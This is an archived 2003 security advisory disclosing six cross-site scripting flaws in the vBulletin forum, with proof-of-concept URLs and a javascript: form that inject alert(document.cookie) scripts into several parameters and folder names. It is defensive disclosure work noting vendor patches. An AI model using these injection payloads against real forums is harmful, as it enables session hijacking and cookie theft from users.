vBulletin Multiple Cross Site Scripting Vulnerabilities

2003-09-19T00:00:00
ID SECURITYVULNS:DOC:5131
Type securityvulns
Reporter Securityvulns
Modified 2003-09-19T00:00:00

Description

SYSTEMS AFFECTED ========

Jelsoft Enterprises vBulletin Forum

(exploited with a browser)

CONTENTS =========

Subject: vBulletin Multiple Cross Site Scripting Vulnerabilities

Date: 17 September 2003 (release from old archive, flaws found on 7 September 2002)

Risk: Low

DESCRIPTION =========

The vBulletin Forum can be forced to return malicious content in user's browser.

There are multiple CSS vulnerabilities (version 3.0 and prior).

DETAILS =========

1) The first bug affects vBulletin version 2.2.7, 2.2.6 and probably previous versions.

The "aim" parameter is not filtered, then is possible the execution of malicious code:

www.host.com/forum/member.php?s=&action=aimmessage&aim=<script>alert(document.cookie)</script>

2) The second one is more difficult to exploit and affects only 2.2.6 (or previous).

Folder names allow execution of code. Version 2.2.7 seems to patch this flaw.

Type in a browser:

javascript:document.write('<form name="form1" action="http://www.host.com/forum/private.php" method="post"><input

type="hidden" name="s" value=""><input type="hidden" name="highest" value="3"><input type="hidden"

name="folderlist[2]" value="<script>alert(document.cookie)</script>"><input type="hidden" name="folderlist[3]"

value=""><input type="hidden" name="folderlist[4]" value=""><input type="hidden" name="action"

value="doeditfolders"><input type="submit" name="submit" value="write to me"></form>');

3) The third bug is exploited through the "membername" parameter in Quickfind form.

Tested on 2.2.6 with quickfind enabled (it's an hack).

4) CSS in Lost Password form:

www.host.com/forum/member.php?s=&action=lostpw&url="><script>alert(document.cookie)</script>

5) CSS in showthread, word highlight function:

www.host.com/forum/showthread.php?s=&threadid=xxxx&highlight="><script>alert(document.cookie)</script>

6) CSS on 2.2.9 and prior. Type this in a forum index page:

javascript:who(document.cookie)

RISKS ==========

Stealing cookies which may contain critical data (personal informations, passwords, etc).

WORKAROUNDS ========

Upgrade to new releases.

VENDOR STATUS ========

vBulletin programmers were notified on 7 September 2002.

All the flaws are already patched from the version 2.2.8 (also for the 3.0 beta).

DISCLAIMER ========

These informations are supplied for educational purpose only.

The author is not liable for the direct or indirect use of these

informations, which can't be used in order to modify or interrupt the operations

of informatic systems.

LEGAL NOTICE ========

This advisory is Copyright (c) 2003 Roberto Dapino.

It can be reproduced without the author's written permission

only if unmodified.

CREDITS =========

Vulnerabilites found by Roberto Dapino, Italy. - roberto@xdesign.it

Special thanks to: vBulletin Programmers.

xdesign.it - stormvision.it


Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!

With a growth rate exceeding 110%, the TICSA security practitioner certification is one of the hottest IT credentials available. And now, for a limited time, you can save 33% off of the TICSA certification exam! To learn more about the TICSA certification, and to register as a TICSA candidate online, just go to

http://www.trusecure.com/offer/s0100/